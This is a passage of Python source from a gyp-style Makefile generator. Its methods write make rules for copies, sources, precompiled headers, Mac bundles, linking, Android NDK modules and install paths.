mkdirs = 'mkdir -p %s; ' % ' '.join(dirs)
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# action, cd_action, and mkdirs get written to a toplevel variable
# called cmd_foo. Toplevel variables can't handle things that change
# per makefile like $(TARGET), so hardcode the target.
if self.flavor == 'mac':
action = [gyp.xcode_emulation.ExpandEnvVars(command, env)
for command in action]
action = gyp.common.EncodePOSIXShellList(action)
action = action.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
mkdirs = mkdirs.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the rule runs an executable from this
# build which links to shared libs from this build.
# rules run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn(
"cmd_%(name)s_%(count)d = LD_LIBRARY_PATH="
"$(builddir)/lib.host:$(builddir)/lib.target:$$LD_LIBRARY_PATH; "
"export LD_LIBRARY_PATH; "
"%(cd_action)s%(mkdirs)s%(action)s" % {
'action': action,
'cd_action': cd_action,
'count': count,
'mkdirs': mkdirs,
'name': name,
})
self.WriteLn(
'quiet_cmd_%(name)s_%(count)d = RULE %(name)s_%(count)d $@' % {
'count': count,
'name': name,
})
self.WriteLn()
count += 1
outputs_variable = 'rule_%s_outputs' % name
self.WriteList(all_outputs, outputs_variable)
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn('### Finished generating for rule: %s' % name)
self.WriteLn()
self.WriteLn('### Finished generating for all rules')
self.WriteLn('')
def WriteCopies(self, copies, extra_outputs, part_of_all):
"""Write Makefile code for any 'copies' from the gyp input.
extra_outputs: a list that will be filled in with any outputs of this action
(used to make other pieces dependent on this action)
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Generated for copy rule.')
variable = StringToMakefileVariable(self.qualified_target + '_copies')
outputs = []
for copy in copies:
for path in copy['files']:
# Absolutify() may call normpath, and will strip trailing slashes.
path = Sourceify(self.Absolutify(path))
filename = os.path.split(path)[1]
output = Sourceify(self.Absolutify(os.path.join(copy['destination'],
filename)))
# If the output path has variables in it, which happens in practice for
# 'copies', writing the environment as target-local doesn't work,
# because the variables are already needed for the target name.
# Copying the environment variables into global make variables doesn't
# work either, because then the .d files will potentially contain spaces
# after variable expansion, and .d file handling cannot handle spaces.
# As a workaround, manually expand variables at gyp time. Since 'copies'
# can't run scripts, there's no need to write the env then.
# WriteDoCmd() will escape spaces for .d files.
env = self.GetSortedXcodeEnv()
output = gyp.xcode_emulation.ExpandEnvVars(output, env)
path = gyp.xcode_emulation.ExpandEnvVars(path, env)
self.WriteDoCmd([output], [path], 'copy', part_of_all)
outputs.append(output)
self.WriteLn('%s = %s' % (variable, ' '.join(map(QuoteSpaces, outputs))))
extra_outputs.append('$(%s)' % variable)
self.WriteLn()
def WriteMacBundleResources(self, resources, bundle_deps):
"""Writes Makefile code for 'mac_bundle_resources'."""
self.WriteLn('### Generated for mac_bundle_resources')
product_dir = generator_default_variables['PRODUCT_DIR']
sources = map(Sourceify, map(self.Absolutify, resources))
bundle_resources = gyp.xcode_emulation.GetMacBundleResources(product_dir, self.xcode_settings, sources)
for output, res in bundle_resources:
_, ext = os.path.splitext(output)
# TODO(refack): actualy figure this out for `copy-bundle-resource`
# is_binary = xcode_emulation.IsBinaryOutputFormat(output)
if ext != '.xcassets':
# Make does not supports '.xcassets' emulation.
self.WriteDoCmd([output], [res], 'mac_tool,,,copy-bundle-resource', part_of_all=True)
bundle_deps.append(output)
def WriteMacInfoPlist(self, bundle_deps):
"""Write Makefile code for bundle Info.plist files."""
info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
lambda p: Sourceify(self.Absolutify(p)))
if not info_plist:
return
if defines:
# Create an intermediate file to store preprocessed results.
intermediate_plist = ('$(obj).$(TOOLSET)/$(TARGET)/' + os.path.basename(info_plist))
self.WriteList(defines, intermediate_plist + ': INFOPLIST_DEFINES', '-D', quoter=EscapeCppDefine)
self.WriteMakeRule([intermediate_plist], [info_plist],
['$(call do_cmd,infoplist)',
# "Convert" the plist so that any weird whitespace changes from the
# preprocessor do not affect the XML parser in mac_tool.
'@plutil -convert xml1 $@ $@'])
info_plist = intermediate_plist
# plists can contain envvars and substitute them into the file.
self.WriteSortedXcodeEnv(out, self.GetSortedXcodeEnv(additional_settings=extra_env))
self.WriteDoCmd([out], [info_plist], 'mac_tool,,,copy-info-plist', part_of_all=True)
bundle_deps.append(out)
def WriteSources(self, configs, deps, sources, extra_outputs, extra_link_deps, precompiled_header):
"""Write Makefile code for any 'sources' from the gyp input.
These are source files necessary to build the current target.
configs, deps, sources: input from gyp.
extra_outputs: a list of extra outputs this action should be dependent on;
used to serialize action/rules before compilation
extra_link_deps: a list that will be filled in with any outputs of
compilation (to be used in link lines)
part_of_all: flag indicating this target is part of 'all'
"""
# Write configuration-specific variables for CFLAGS, etc.
for configname in sorted(configs.keys()):
config = configs[configname]
self.WriteList(config.get('defines'), 'DEFS_%s' % configname, prefix='-D', quoter=EscapeCppDefine)
if self.flavor == 'mac':
cflags = self.xcode_settings.GetCflags(configname)
cflags_c = self.xcode_settings.GetCflagsC(configname)
cflags_cc = self.xcode_settings.GetCflagsCC(configname)
cflags_objc = self.xcode_settings.GetCflagsObjC(configname)
cflags_objcc = self.xcode_settings.GetCflagsObjCC(configname)
else:
cflags = config.get('cflags')
cflags_c = config.get('cflags_c')
cflags_cc = config.get('cflags_cc')
cflags_objc = None
cflags_objcc = None
self.WriteLn("# Flags passed to all source files.")
self.WriteList(cflags, 'CFLAGS_%s' % configname)
self.WriteLn("# Flags passed to only C files.")
self.WriteList(cflags_c, 'CFLAGS_C_%s' % configname)
self.WriteLn("# Flags passed to only C++ files.")
self.WriteList(cflags_cc, 'CFLAGS_CC_%s' % configname)
if self.flavor == 'mac':
self.WriteLn("# Flags passed to only ObjC files.")
self.WriteList(cflags_objc, 'CFLAGS_OBJC_%s' % configname)
self.WriteLn("# Flags passed to only ObjC++ files.")
self.WriteList(cflags_objcc, 'CFLAGS_OBJCC_%s' % configname)
includes = config.get('include_dirs')
if includes:
includes = [Sourceify(self.Absolutify(include)) for include in includes]
self.WriteList(includes, 'INCS_%s' % configname, prefix='-I')
compilable = filter(Compilable, sources)
objs = [self.Objectify(self.Absolutify(Target(x))) for x in compilable]
self.WriteList(objs, 'OBJS')
for obj in objs:
assert ' ' not in obj, (
"Spaces in object filenames not supported (%s)" % obj)
self.WriteLn('# Add to the list of files we specially track '
'dependencies for.')
self.WriteLn('all_deps += $(OBJS)')
self.WriteLn()
# Make sure our dependencies are built first.
if deps:
self.WriteMakeRule(['$(OBJS)'], deps,
comment='Make sure our dependencies are built before any of us.',
order_only=True)
# Make sure the actions and rules run first.
# If they generate any extra headers etc., the per-.o file dep tracking
# will catch the proper rebuilds, so order only is still ok here.
if extra_outputs:
self.WriteMakeRule(['$(OBJS)'], extra_outputs,
comment='Make sure our actions/rules run before any of us.',
order_only=True)
pchdeps = precompiled_header.GetObjDependencies(compilable, objs)
if pchdeps:
self.WriteLn('# Dependencies from obj files to their precompiled headers')
for source, obj, gch in pchdeps:
self.WriteLn('%s: %s' % (obj, gch))
self.WriteLn('# End precompiled header dependencies')
if objs:
extra_link_deps.append('$(OBJS)')
self.WriteLn("""\
# CFLAGS et al overrides must be target-local.
# See "Target-specific Variable Values" in the GNU Make manual.""")
self.WriteLn("$(OBJS): TOOLSET := $(TOOLSET)")
self.WriteLn("$(OBJS): GYP_CFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('c') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_CXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('cc') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE))")
if self.flavor == 'mac':
self.WriteLn("$(OBJS): GYP_OBJCFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('m') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE)) "
"$(CFLAGS_OBJC_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_OBJCXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('mm') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE)) "
"$(CFLAGS_OBJCC_$(BUILDTYPE))")
self.WritePchTargets(precompiled_header.GetPchBuildCommands())
# If there are any object files in our input file list, link them into our
# output.
extra_link_deps += [source for source in sources if Linkable(source)]
self.WriteLn()
def WritePchTargets(self, pch_commands):
"""Writes make rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, inpt in pch_commands:
extra_flags = {
'c': '$(CFLAGS_C_$(BUILDTYPE))',
'cc': '$(CFLAGS_CC_$(BUILDTYPE))',
'm': '$(CFLAGS_C_$(BUILDTYPE)) $(CFLAGS_OBJC_$(BUILDTYPE))',
'mm': '$(CFLAGS_CC_$(BUILDTYPE)) $(CFLAGS_OBJCC_$(BUILDTYPE))',
}[lang]
var_name = {
'c': 'GYP_PCH_CFLAGS',
'cc': 'GYP_PCH_CXXFLAGS',
'm': 'GYP_PCH_OBJCFLAGS',
'mm': 'GYP_PCH_OBJCXXFLAGS',
}[lang]
self.WriteLn("%s: %s := %s " % (gch, var_name, lang_flag) +
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"$(CFLAGS_$(BUILDTYPE)) " +
extra_flags)
self.WriteLn('%s: %s FORCE_DO_CMD' % (gch, inpt))
self.WriteLn('\t@$(call do_cmd,pch_%s,1)' % lang)
self.WriteLn('')
assert ' ' not in gch, (
"Spaces in gch filenames not supported (%s)" % gch)
self.WriteLn('all_deps += %s' % gch)
self.WriteLn('')
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
assert not self.is_mac_bundle
if self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module'):
return self.xcode_settings.GetExecutablePath()
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.a'
elif self.type in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
if self.flavor == 'aix':
target_ext = '.a'
else:
target_ext = '.so'
elif self.type == 'none':
target = '%s.stamp' % target
elif self.type != 'executable':
print(("ERROR: What output file should be generated?",
"type", self.type, "target", target))
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
return target_prefix + target + target_ext
def _InstallImmediately(self):
return self.toolset == 'target' and self.flavor == 'mac' and self.type in ('static_library', 'executable', 'shared_library', 'loadable_module')
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
assert not self.is_mac_bundle
path = os.path.join('$(obj).' + self.toolset, self.path)
if self.type == 'executable' or self._InstallImmediately():
path = '$(builddir)'
path = spec.get('product_dir', path)
return os.path.join(path, self.ComputeOutputBasename(spec))
def ComputeMacBundleOutput(self):
"""Return the 'output' (full output path) to a bundle output directory."""
assert self.is_mac_bundle
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetWrapperName())
def ComputeMacBundleBinaryOutput(self):
"""Return the 'output' (full output path) to the binary in a bundle."""
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetExecutablePath())
@staticmethod
def ComputeDeps(spec):
"""Compute the dependencies of a gyp spec.
Returns a tuple (deps, link_deps), where each is a list of
filenames that will need to be put in front of make for either
building (deps) or linking (link_deps).
"""
deps = []
link_deps = []
if 'dependencies' in spec:
deps.extend([target_outputs[dep] for dep in spec['dependencies']
if target_outputs[dep]])
for dep in spec['dependencies']:
if dep in target_link_deps:
link_deps.append(target_link_deps[dep])
deps.extend(link_deps)
# TODO: It seems we need to transitively link in libraries (e.g. -lfoo)?
# This hack makes it work:
# link_deps.extend(spec.get('libraries', []))
return gyp.common.uniquer(deps), gyp.common.uniquer(link_deps)
def WriteDependencyOnExtraOutputs(self, extra_outputs):
self.WriteMakeRule([self.output_binary], extra_outputs, comment='Build our special outputs first.', order_only=True)
def WriteTarget(self, spec, configs, deps, link_deps, bundle_deps, extra_outputs, part_of_all):
"""
Write Makefile code to produce the final target of the gyp spec.
spec: input from gyp.
configs: input from gyp.
deps: dependency lists; see ComputeDeps()
link_deps: dependency lists; see ComputeDeps()
extra_outputs: any extra outputs that our target should depend on
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Rules for final target.')
if extra_outputs:
self.WriteDependencyOnExtraOutputs(extra_outputs)
self.WriteMakeRule(extra_outputs, deps, comment='Preserve order dependency of special output on deps.', order_only=True)
target_postbuilds = {}
if self.type != 'none':
for configname in sorted(configs.keys()):
config = configs[configname]
if self.flavor == 'mac':
ldflags = self.xcode_settings.GetLdflags(configname,
generator_default_variables['PRODUCT_DIR'],
lambda p: Sourceify(self.Absolutify(p)))
# TARGET_POSTBUILDS_$(BUILDTYPE) is added to postbuilds later on.
gyp_to_build = gyp.common.InvertRelativePath(self.path)
target_postbuild = self.xcode_settings.AddImplicitPostbuilds(
configname,
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output))),
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output_binary))))
if target_postbuild:
target_postbuilds[configname] = target_postbuild
else:
ldflags = config.get('ldflags', [])
# Compute an rpath for this output if needed.
if any(dep.endswith('.so') or '.so.' in dep for dep in deps):
# We want to get the literal string "$ORIGIN" into the link command,
# so we need lots of escaping.
ldflags.append(r'-Wl,-rpath=\$$ORIGIN/lib.%s/' % self.toolset)
ldflags.append(r'-Wl,-rpath-link=\$(builddir)/lib.%s/' %
self.toolset)
library_dirs = config.get('library_dirs', [])
ldflags += [('-L%s' % library_dir) for library_dir in library_dirs]
self.WriteList(ldflags, 'LDFLAGS_%s' % configname)
if self.flavor == 'mac':
self.WriteList(self.xcode_settings.GetLibtoolflags(configname),
'LIBTOOLFLAGS_%s' % configname)
libraries = spec.get('libraries')
if libraries:
# Remove duplicate entries
libraries = gyp.common.uniquer(libraries)
if self.flavor == 'mac':
libraries = self.xcode_settings.AdjustLibraries(libraries)
self.WriteList(libraries, 'LIBS')
self.WriteLn('%s: GYP_LDFLAGS := $(LDFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
self.WriteLn('%s: LIBS := $(LIBS)' % QuoteSpaces(self.output_binary))
if self.flavor == 'mac':
self.WriteLn('%s: GYP_LIBTOOLFLAGS := $(LIBTOOLFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
# Postbuild actions. Like actions, but implicitly depend on the target's
# output.
postbuilds = []
if self.flavor == 'mac':
if target_postbuilds:
postbuilds.append('$(TARGET_POSTBUILDS_$(BUILDTYPE))')
postbuilds.extend(gyp.xcode_emulation.GetSpecPostbuildCommands(spec))
if postbuilds:
# Envvars may be referenced by TARGET_POSTBUILDS_$(BUILDTYPE),
# so we must output its definition first, since we declare variables
# using ":=".
self.WriteSortedXcodeEnv(self.output, self.GetSortedXcodePostbuildEnv())
for configname in target_postbuilds:
self.WriteLn('%s: TARGET_POSTBUILDS_%s := %s' % (QuoteSpaces(self.output), configname, gyp.common.EncodePOSIXShellList(target_postbuilds[configname])))
# Postbuilds expect to be run in the gyp file's directory, so insert an
# implicit postbuild to cd to there.
postbuilds.insert(0, gyp.common.EncodePOSIXShellList(['cd', self.path]))
for i, postbuild in enumerate(postbuilds):
if not postbuild.startswith('$'):
postbuilds[i] = EscapeShellArgument(postbuild)
self.WriteLn('%s: builddir := $(abs_builddir)' % QuoteSpaces(self.output))
self.WriteLn('%s: POSTBUILDS := %s' % (
QuoteSpaces(self.output), ' '.join(postbuilds)))
# A bundle directory depends on its dependencies such as bundle resources
# and bundle binary. When all dependencies have been built, the bundle
# needs to be packaged.
if self.is_mac_bundle:
# If the framework doesn't contain a binary, then nothing depends
# on the actions -- make the framework depend on them directly too.
self.WriteDependencyOnExtraOutputs(extra_outputs)
# Bundle dependencies. Note that the code below adds actions to this
# target, so if you move these two lines, move the lines below as well.
self.WriteList(map(QuoteSpaces, bundle_deps), 'BUNDLE_DEPS')
self.WriteLn('%s: $(BUNDLE_DEPS)' % QuoteSpaces(self.output))
# After the framework is built, package it. Needs to happen before
# postbuilds, since postbuilds depend on this.
if self.type in ('shared_library', 'loadable_module'):
self.WriteLn('\t@$(call do_cmd,mac_package_framework,,,%s)' % self.xcode_settings.GetFrameworkVersion())
# Bundle postbuilds can depend on the whole bundle, so run them after
# the bundle is packaged, not already after the bundle binary is done.
if postbuilds:
self.WriteLn('\t@$(call do_postbuilds)')
postbuilds = [] # Don't write postbuilds for target's output.
# Needed by test/mac/gyptest-rebuild.py.
self.WriteLn('\t@true # No-op, used by tests')
# Since this target depends on binary and resources which are in
# nested subfolders, the framework directory will be older than
# its dependencies usually. To prevent this rule from executing
# on every build (expensive, especially with postbuilds), expliclity
# update the time on the framework directory.
self.WriteLn('\t@touch -c %s' % QuoteSpaces(self.output))
if postbuilds:
assert not self.is_mac_bundle, ('Postbuilds for bundles should be done on the bundle, not the binary (target \'%s\')' % self.target)
assert 'product_dir' not in spec, 'Postbuilds do not work with custom product_dir'
if self.type == 'executable':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'link_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'link', part_of_all, postbuilds=postbuilds)
elif self.type == 'static_library':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in alink input filenames not supported (%s)" % link_dep)
if (self.flavor not in ('mac', 'openbsd', 'netbsd', 'win') and not
self.is_standalone_static_library):
self.WriteDoCmd([self.output_binary], link_deps, 'alink_thin', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'alink', part_of_all, postbuilds=postbuilds)
elif self.type == 'shared_library':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
self.WriteDoCmd([self.output_binary], link_deps, 'solink', part_of_all, postbuilds=postbuilds)
elif self.type == 'loadable_module':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in module input filenames not supported (%s)" % link_dep)
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module', part_of_all, postbuilds=postbuilds)
elif self.type == 'none':
# Write a stamp line.
self.WriteDoCmd([self.output_binary], deps, 'touch', part_of_all, postbuilds=postbuilds)
else:
print("WARNING: no output for", self.type, self.target)
# Add an alias for each target (if there are any outputs).
# Installable target aliases are created below.
if ((self.output and self.output != self.target) and
(self.type not in self._INSTALLABLE_TARGETS)):
self.WriteMakeRule([self.target], [self.output], comment='Add target alias', phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [self.target], comment='Add target alias to "all" target.', phony=True)
# Add special-case rules for our installable targets.
# 1) They need to install to the build dir or "product" dir.
# 2) They get shortcuts for building (e.g. "make chrome").
# 3) They are part of "make all".
if (self.type in self._INSTALLABLE_TARGETS or
self.is_standalone_static_library):
if self.type == 'shared_library':
file_desc = 'shared library'
elif self.type == 'static_library':
file_desc = 'static library'
else:
file_desc = 'executable'
install_path = self._InstallableTargetInstallPath()
installable_deps = [self.output]
if (self.flavor == 'mac' and not 'product_dir' in spec and
self.toolset == 'target'):
# On mac, products are created in install_path immediately.
assert install_path == self.output, '%s != %s' % (install_path, self.output)
# Point the target alias to the final binary output.
self.WriteMakeRule([self.target], [install_path],
comment='Add target alias', phony=True)
if install_path != self.output:
assert not self.is_mac_bundle # See comment a few lines above.
self.WriteDoCmd([install_path], [self.output], 'copy', comment='Copy this to the %s output path.' % file_desc, part_of_all=part_of_all)
installable_deps.append(install_path)
if self.output != self.alias and self.alias != self.target:
self.WriteMakeRule([self.alias], installable_deps, comment='Short alias for building this %s.' % file_desc, phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [install_path], comment='Add %s to "all" target.' % file_desc, phony=True)
def WriteList(self, value_list, variable=None, prefix='', quoter=QuoteIfNecessary):
"""
Write a variable definition that is a list of values.
E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
foo = blaha blahb
but in a pretty-printed style.
"""
values = ''
if value_list:
value_list = [quoter(prefix + l) for l in value_list]
values = ' \\\n\t' + ' \\\n\t'.join(value_list)
self.fp.write('%s :=%s\n\n' % (variable, values))
# TODO(refack) `part_of_all` is not used, but is part of signature used in many other places
# noinspection PyUnusedLocal
def WriteDoCmd(self, outputs, inputs, command, part_of_all=False, comment=None, postbuilds=None):
"""
Write a Makefile rule that uses do_cmd.
This makes the outputs dependent on the command line that was run,
as well as support the V= make command line flag.
"""
suffix = ''
if postbuilds:
assert ',' not in command
suffix = ',,1' # Tell do_cmd to honor $POSTBUILDS
self.WriteMakeRule(
outputs,
inputs,
actions=['$(call do_cmd,%s%s)' % (command, suffix)],
comment=comment,
command=command,
force=True
)
# Add our outputs to the list of targets we read depfiles from.
# all_deps is only used for deps file reading, and for deps files we replace
# spaces with ? because escaping doesn't work with make's $(sort) and
# other functions.
outputs = [QuoteSpaces(o, SPACE_REPLACEMENT) for o in outputs]
self.WriteLn('all_deps += %s' % ' '.join(outputs))
def WriteMakeRule(self, outputs, inputs, actions=None, comment=None, order_only=False, force=False, phony=False, command=None):
"""
Write a Makefile rule, with some extra tricks.
outputs: a list of outputs for the rule (note: this is not directly
supported by make; see comments below)
inputs: a list of inputs for the rule
actions: a list of shell commands to run for the rule
comment: a comment to put in the Makefile above the rule (also useful
for making this Python script's code self-documenting)
order_only: if true, makes the dependency order-only
force: if true, include FORCE_DO_CMD as an order-only dep
phony: if true, the rule does not actually generate the named output, the
output is just a name to run the rule
command: (optional) command name to generate unambiguous labels
"""
outputs = [QuoteSpaces(o) for o in outputs]
inputs = map(QuoteSpaces, inputs)
if comment:
self.WriteLn('# ' + comment)
if phony:
self.WriteLn('.PHONY: ' + ' '.join(outputs))
if actions:
self.WriteLn("%s: TOOLSET := $(TOOLSET)" % outputs[0])
force_append = ' FORCE_DO_CMD' if force else ''
if order_only:
# Order only rule: Just write a simple rule.
# TODO(evanm): just make order_only a list of deps instead of this hack.
self.WriteLn('%s: | %s%s' % (' '.join(outputs), ' '.join(inputs), force_append))
elif len(outputs) == 1:
# Regular rule, one output: Just write a simple rule.
self.WriteLn('%s: %s%s' % (outputs[0], ' '.join(inputs), force_append))
else:
# Regular rule, more than one output: Multiple outputs are tricky in make. We will write three rules:
# - All outputs depend on an intermediate file.
# - Make .INTERMEDIATE depend on the intermediate.
# - The intermediate file depends on the inputs and executes the actual command.
# - The intermediate recipe will 'touch' the intermediate file.
# - The multi-output rule will have a do-nothing recipe.
# Hash the target name to avoid generating overlong filenames.
key = (command if command else self.target).encode('utf-8')
slug = re.sub(r'\w', key, '')
cmddigest = hashlib.sha1(key).hexdigest()
intermediate = "%s.%s.intermediate" % (cmddigest, slug)
self.WriteLn('%s: %s' % (' '.join(outputs), intermediate))
self.WriteLn('\t%s' % '@:')
self.WriteLn('%s: %s' % ('.INTERMEDIATE', intermediate))
self.WriteLn('%s: %s%s' % (intermediate, ' '.join(inputs), force_append))
actions.insert(0, '$(call do_cmd,touch)')
if actions:
for action in actions:
self.WriteLn('\t%s' % action)
self.WriteLn()
def WriteAndroidNdkModuleRule(self, module_name, all_sources, link_deps):
"""Write a set of LOCAL_XXX definitions for Android NDK.
These variable definitions will be used by Android NDK but do nothing for
non-Android applications.
Arguments:
module_name: Android NDK module name, which must be unique among all
module names.
all_sources: A list of source files (will be filtered by Compilable).
link_deps: A list of link dependencies, which must be sorted in
the order from dependencies to dependents.
"""
if self.type not in ('executable', 'shared_library', 'static_library'):
return
self.WriteLn('# Variable definitions for Android applications')
self.WriteLn('include $(CLEAR_VARS)')
self.WriteLn('LOCAL_MODULE := ' + module_name)
self.WriteLn('LOCAL_CFLAGS := $(CFLAGS_$(BUILDTYPE)) '
'$(DEFS_$(BUILDTYPE)) '
# LOCAL_CFLAGS is applied to both of C and C++. There is
# no way to specify $(CFLAGS_C_$(BUILDTYPE)) only for C
# sources.
'$(CFLAGS_C_$(BUILDTYPE)) '
# $(INCS_$(BUILDTYPE)) includes the prefix '-I' while
# LOCAL_C_INCLUDES does not expect it. So put it in
# LOCAL_CFLAGS.
'$(INCS_$(BUILDTYPE))')
# LOCAL_CXXFLAGS is obsolete and LOCAL_CPPFLAGS is preferred.
self.WriteLn('LOCAL_CPPFLAGS := $(CFLAGS_CC_$(BUILDTYPE))')
self.WriteLn('LOCAL_C_INCLUDES :=')
self.WriteLn('LOCAL_LDLIBS := $(LDFLAGS_$(BUILDTYPE)) $(LIBS)')
# Detect the C++ extension.
cpp_ext = {'.cc': 0, '.cpp': 0, '.cxx': 0}
default_cpp_ext = '.cpp'
for filename in all_sources:
ext = os.path.splitext(filename)[1]
if ext in cpp_ext:
cpp_ext[ext] += 1
if cpp_ext[ext] > cpp_ext[default_cpp_ext]:
default_cpp_ext = ext
self.WriteLn('LOCAL_CPP_EXTENSION := ' + default_cpp_ext)
self.WriteList(map(self.Absolutify, filter(Compilable, all_sources)),
'LOCAL_SRC_FILES')
# Filter out those which do not match prefix and suffix and produce
# the resulting list without prefix and suffix.
def DepsToModules(deps, prefix, suffix):
modules = []
for filepath in deps:
mod_filename = os.path.basename(filepath)
if mod_filename.startswith(prefix) and mod_filename.endswith(suffix):
modules.append(mod_filename[len(prefix):-len(suffix)])
return modules
# Retrieve the default value of 'SHARED_LIB_SUFFIX'
params = {'flavor': 'linux'}
default_variables = {}
CalculateVariables(default_variables, params)
self.WriteList(
DepsToModules(link_deps, generator_default_variables['SHARED_LIB_PREFIX'], default_variables['SHARED_LIB_SUFFIX']),
'LOCAL_SHARED_LIBRARIES')
self.WriteList(
DepsToModules(link_deps, generator_default_variables['STATIC_LIB_PREFIX'], generator_default_variables['STATIC_LIB_SUFFIX']),
'LOCAL_STATIC_LIBRARIES')
if self.type == 'executable':
self.WriteLn('include $(BUILD_EXECUTABLE)')
elif self.type == 'shared_library':
self.WriteLn('include $(BUILD_SHARED_LIBRARY)')
elif self.type == 'static_library':
self.WriteLn('include $(BUILD_STATIC_LIBRARY)')
self.WriteLn()
def WriteLn(self, text=''):
self.fp.write(text + '\n')
def GetSortedXcodeEnv(self, additional_settings=None):
return gyp.xcode_emulation.GetSortedXcodeEnv(self.xcode_settings, "$(abs_builddir)", os.path.join("$(abs_srcdir)", self.path), "$(BUILDTYPE)", additional_settings)
def GetSortedXcodePostbuildEnv(self):
# CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
# TODO(thakis): It would be nice to have some general mechanism instead.
strip_save_file = self.xcode_settings.GetPerTargetSetting('CHROMIUM_STRIP_SAVE_FILE', '')
# Even if strip_save_file is empty, explicitly write it. Else a postbuild
# might pick up an export from an earlier target.
return self.GetSortedXcodeEnv(additional_settings={'CHROMIUM_STRIP_SAVE_FILE': strip_save_file})
def WriteSortedXcodeEnv(self, target, env):
for k, v in env:
# For
# foo := a\ b
# the escaped space does the right thing. For
# export foo := a\ b
# it does not -- the backslash is written to the env as literal character.
# So don't escape spaces in |env[k]|.
self.WriteLn('%s: export %s := %s' % (QuoteSpaces(target), k, v))
def Objectify(self, path):
"""Convert a path to its output directory form."""
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/' % self.toolset)
if not '$(obj)' in path:
path = '$(obj).%s/$(TARGET)/%s' % (self.toolset, path)
return path
def Pchify(self, path, lang):
"""Convert a prefix header path to its output directory form."""
path = self.Absolutify(path)
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/pch-%s' %
(self.toolset, lang))
return path
return '$(obj).%s/$(TARGET)/pch-%s/%s' % (self.toolset, lang, path)
def Absolutify(self, path):
"""Convert a subdirectory-relative path into a base-relative path.
Skips over paths that contain variables."""
if '$(' in path:
# Don't call normpath in this case, as it might collapse the
# path too aggressively if it features '..'. However it's still
# important to strip trailing slashes.
return path.rstrip('/')
return os.path.normpath(os.path.join(self.path, path))
@staticmethod
def ExpandInputRoot(template, expansion, dirname):
if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template:
return template
path = template % {
'INPUT_ROOT': expansion,
'INPUT_DIRNAME': dirname,
}
return path
def _InstallableTargetInstallPath(self):
"""Returns the location of the final output for an installable target."""
# Xcode puts shared_library results into PRODUCT_DIR, and some gyp files
# rely on this. Emulate this behavior for mac.
if (self.type == 'shared_library' and
(self.flavor != 'mac' or self.toolset != 'target')):
# Install all shared libs into a common directory (per toolset) for
# convenient access with LD_LIBRARY_PATH.
return '$(builddir)/lib.%s/%s' % (self.toolset, self.alias)
